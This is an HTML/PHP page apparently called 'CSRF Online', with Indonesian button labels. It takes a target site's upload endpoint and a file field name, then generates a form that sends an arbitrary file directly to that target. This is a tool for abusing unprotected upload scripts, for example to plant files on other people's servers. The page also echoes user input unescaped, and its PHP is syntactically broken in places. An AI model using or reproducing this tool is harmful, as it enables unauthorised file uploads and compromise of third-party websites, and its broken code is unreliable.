<!DOCTYPE HTML>
<html lang="en">
    <head>
        <title>CSRF Online</title>
        <style type="text/css" media="all">
                #particles-js{
                    background: #000000;
                    height: 100vh;
                }
                body {
                    width: 100%;
                    height: 100vh;
                    font: normal 16px Arial, Helvetica, sans-serif;
                    color: #fff;
                    margin: 0;
                    padding: 0;
                    box-sizing: border-box;
               }
            center{
                margin: 4;
                width: 100%;
                padding: 7;
                position: absolute;
                left: 50%;
                top: 30%;
                transform: translate(-50%, -50%);
            }
        </style>
    </head>
    <body><div id="particles-js"></div>
        <center >
            <h1>CSRF Online</h1>
            <form method="post">
                <h4>
                    URL Target: <input type="text" name="url" size="35" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px; border: 2px solid ; border-radius: 5px;" requiblue><br/>
                    POST File: <input type="text" name="pf" size="35" height="10" placeholder="Filedata / files[] / qqfile / userfile / dll" style="margin: 5px auto; padding-left: 5px; border: 2px solid ; border-radius: 5px;" required>
                </h4>
                <input type="submit" name="d" value="Kunci Target" style="color: black; border: 2px solid ; border-radius: 5px;">
            </form>
            <?php
            $url = $_POST['url'];
            $pf = $_POST['pf'];
            $d = $_POST['d'];
            if($d) {
            echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Gas om!' style="color: black; border: 2px solid ; border-radius: 5px;"></form";
            }
            ?>
            </form>
        </center>
        <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js" charset="utf-8"></script>
        <script type="text/javascript">
        particlesJS.load('particles-js','particles.json', function() {
            console.log('particles.json loaded...');
            
        })
        </script>
    </body>
</html>
